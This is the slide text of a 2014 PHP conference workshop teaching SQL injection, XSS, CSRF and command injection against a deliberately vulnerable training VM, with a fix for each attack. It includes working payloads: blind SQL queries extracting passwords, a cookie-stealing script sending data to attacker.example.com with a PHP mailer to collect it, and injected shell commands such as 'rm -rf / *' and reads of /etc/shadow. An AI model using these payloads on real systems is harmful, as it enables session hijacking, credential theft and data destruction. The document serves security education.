Hacking Sites for Fun and
Profit
php|tek 2014
David Stockton

or How to Hack
Websites and Prevent
Your Site from Being
Hacked

What this is for
• Learn how common exploits are
done and how to identify code
that is vulnerable
• Learn how to fix code that is
susceptible to these attacks
• Learn how to attack your own
code and your own sites so you
can fix them

What this is not for
• Hacking or attacking sites
that you do not have
permission to attack
!
• If you don’t have permission,
don’t do it.

The Code
• The code I am showing you is
similar to real code I’ve seen in
real projects, but it was written
specifically for this presentation.

Gouda Times
• Provided on the VM is a hackable site - The
Gouda Times cheese shop and social
cheese site

What you need
• Virtualbox 4.3
• The VM
• A browser (preferably chrome but any
works)
• Something to send HTTP requests to the
server on the VM

Getting Started
• Copy the contents of the thumb drive -
• There are 4 files:
• Virtualbox for Mac and Windows
• The VM
• An image

Import the VM
• Start the VM in virtual box and log into the console (vagrant /
vagrant)
• ifconfig -a
• Find eth*
• Edit /etc/sysconfig/network-scripts/ifcfg-eth1
• Change DEVICE= to match eth* from above
• sudo service network restart
• mailcatcher —ip=0.0.0.0

One note about email
• On the VM is mailcatcher. It will catch any
emails that the system or you cause to be
sent. You can access it at http://
hacksite.dev:1080/

To play fair
• Don’t go on the VM after the initial set up.
However, all the code is there and if you
really want to look, feel free:
• /vagrant_web
• Try to figure out some exploits without
looking at the code first though

On your host
• Ping 192.168.33.199
• ssh vagrant@192.168.33.199 (password
vagrant)
• If this works, add a host entry (/etc/hosts
or /windws/system32/driver/etc/hosts for
hackingsite.dev to 192.168.33.199

Open your browser

Start hacking
• There are loads and loads of vulnerabilities
• If you break the VM, just re-import and start
again
• This is your VM on your computer. Anything
destructive you do is on you. Be sure you’re in
the VM before seeing if
rm -rf /* works

A brief introduction to
common exploits
• In case this is all completely new

Exploit 1:
• SQL injection
!
• select * from users where
username =
'$_POST['username']';

SQL Injection
• $_POST['username'] = “' OR
1=1; --;”;
!
!
• select * from users where
username = '' OR 1=1; --;';

SQL Injection
• $_GET
• $_POST
• $_REQUEST
!
• what else...

SQL Injection
• $_COOKIE
!
• values from the database
!
• Some parts of $_SERVER

Errors can help attackers
• Showing SQL errors can help attackers fix SQL injection
attempts
!
• Other errors can help in other ways (some show
passwords)
!
• Turn off display_errors in production, but log errors
always

Blind SQL injection
• Make calls that take
varying amounts of time to
run. Use the time to
determine the answers to
questions about the
systems you are attacking.

Blind SQL injection
• http://news.org/news.php?id=5
• http://news.org/news.php?id=5 and 1=1
• http://news.org/news.php?id=5 and 1=2

Determine DB version
• news.php?id=5 and
substring(@@version,
1,1)=5

Subselects?
•
news.php?id=5 and
(select 1) = 1

Access to other databases/
tables
• news.php?id=12 and
(select 1 from mysql.user
limit 0,1) = 1

Guessing tables
• news.php?id=6 and
(select 1 from users
limit 0,1) =1

Guessing column names
• news.php?id=11 and (select
substring(concat(1, password),1,1) from
users limit 0,1)=1

Guessing data
• news.php?id=4 and
ascii(substring((SELECT concat(username,
0x3a, password) from users limit 0,1),
1,1))>80
!
• Increment to guess values letter by letter

Preventing SQL Injection
● mysql_real_escape_string
● Prepared statements
● Input validation and whitelists

Exploit 2:
• XSS
!
• Cross-site Scripting

What is it?
• User supplied
code running in
the browser

So? It’s their browser
• Yep, but it may not
be their code.

So? It’s their browser
• It may not be your
code, but it might
call your code in a
way you don’t want

XSS Code
<img src=”<?php echo $_POST[‘image’];?>”>
<.. javascript to open the print dialog ..>

So what?
• What if we post code into
$_POST[‘image’]
!
● Steal session cookies
● Call Javascript APIs to cause actions
on the server (CSRF)
● Post forms as the user

The payload:
$_POST[‘image’]
/images/add.gif"><script type="text/
javascript">alert('xss!');</script><img
src="

Ermahgerd er perperp.

Ooh, that’s soooo malicious,
I’m totally shaking right now
• Fine. How about this.
!
!
• image = /images/add.gif"><script type="text/
javascript">document.write('<img src="http://
attacker.example.com/session.php?' +
document.cookie + '">'); </script><img src="

WTH did that do?
• Javascript ran FROM the site
we’re attacking and it sent
your site cookies to a script
the attacker controls.

So you stole my cookie. So
what?
• Here’s what.
<?php
$session = $_GET['PHPSESSID'];
$body = 'Got session: ' . $session;
mail('attackeremail@attacker.example.org',
'Session Captured', $body);

Oooh, you emailed my
cookie... So...

Now it’s my turn...

Why this matters
• Sites identify and authenticate
users with session.
• I have identified myself as you. I
am now logged in as you and
can do anything you can do on
the site.

Ok, so I can steal my own
session
• Here’s how to use
it against someone.

The first part of the attack
• Create an email to a link on the
attacking site that posts the code to the
site under attack. Send the email to the
victim.
!
• They click the link, you steal their
session.

What else can I do?
• Cross Site Request Forgery (CSRF)
• Causing actions to happen on the user’s
behalf
• Purchasing things, changing passwords,
creating accounts, etc.

How to prevent?
• Escape output
• Whitelist URLs, domains, input
• Make the print page lookup and use image
paths from a trusted source (database
maybe?)

Prevent CSRF
• Use a CSRF token.
• Disallow requests
that don’t contain the
correct token.

Exploit prevention in
general
• Filter input
• Escape output
• This works for SQL injection, XSS and
more...
• in general

Exploit 3: Command
injection
● shell_exec
● exec
● passthru
● system
● `some command`

PHP Web File Browser
• Supposed to allow viewing of files within
the web directories
• $files = shell_exec(‘ls -al ’ .
$_GET[‘dir’]);

What’s the danger?
• $_GET[‘dir’] = ‘.; rm -rf / *’;
• Or whatever.
• cat /etc/passwd; cat /etc/shadow

How to prevent?
• If you must use user input in a command,
use escapeshellarg()
• $dir = escapeshellarg($_GET[‘dir’]);
• $files = shell_exec(‘ls -al ‘ . $dir);
• Validate that the input is allowed

Other types of injection
● Code (eval)
● Regex
● Log
● LDAP

Other exploits
● Authentication / Session management
● Information disclosure
● Sensitive data exposure
● File upload flaws
● Unchecked redirects
● Leftover debug code
● Session fixation
● Internal threats
● Privacy Violation (password in logs,
etc)

Mitigation
• Validation on the client
• Reject invalid requests entirely, log
intrusion attempt
• Principle of least privilege
• Filter input, escape output

One more exploit
• Session puzzling attack
• http://bit.ly/1eO7jPK

Session Puzzling
• Making requests to privileged and
unprivileged pages in a particular order
that can escalate privileges of the attacker

How it could work
• Page requiring authentication looks for
‘user’ in session to determine
authentication

Session Puzzling
• Login -> forgot password page sends
information via ‘user’ in session

Put it together
• Hit pages quickly in this order:
• Login -> forgot password / privileged page
• Privileged page sees ‘user’ and allows
attacker in

How was this found?
• By accident, via web crawler getting
access to privileged pages

Now what?
• Find as many exploits as possible in
Gouda Times
• Be creative, you can use multiple exploits
in a single creative hack
• Stuck for ideas?

Ideas
• Trick the system to give up another user’s
password
• Log in to the system as another user
without knowing their password
• Change guestbook entries
• Remove guestbook entries

More ideas
• View nearly any file on the system
• Get your own code onto the system
• Find hidden functionality
• Exploit the site with an image
• Create more users than the system thinks you should
have
• Social engineering - get someone to tell you a password

Time to get with the
hacking

If you have questions or
need help I’ll be around
• If you get a hack to work, let me know and
you can share what you did and how
• If you want to try to fix it, the source is on
the VM - show me your fix, I’ll try to break it

Want to hack more?
• http://www.badstore.net/
• http://google-gruyere.appspot.com/
• http://www.dvwa.co.uk/

Please rate this tutorial
• https://joind.in/10664